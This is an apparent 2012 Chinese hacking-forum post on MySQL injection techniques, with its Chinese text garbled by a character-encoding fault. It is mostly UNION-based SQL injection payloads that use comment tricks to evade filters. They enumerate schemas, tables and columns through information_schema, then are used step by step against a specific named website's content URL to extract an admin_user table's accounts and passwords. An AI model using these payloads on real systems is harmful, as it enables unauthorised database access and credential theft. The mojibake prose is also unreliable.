mysql×¢Èë¼¼ÇÉ

admin ·¢±íÓÚ 2012-9-13 16:29:37

²é¿â

id=-1 union select 1,..,SCHEMA_NAME,nfrom/**/information_schema.SCHEMATA limit 1,1/*

²é±í

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=¿âµÄHEXÖµ/**/limit/**/1,1

²é¶Î

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=±íµÄHEXÖµ/**/limit/**/1,1

mysql5¸ß¼¶×¢Èë·½·¨±©±í

Àý×ÓÈçÏÂ:

1.±¬±í
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574ÎªÊý¾Ý¿âÃûµÄ16½øÖÆ×ª»»yd_teamnet)
ÕâÑù±¬µ½µÚ4¸öÊ±³öÏÖÁËadmin_user±í¡£

2.±©×Ö¶Î
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3.±¬ÃÜÂë
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

mysql×¢Èë¼¼ÇÉ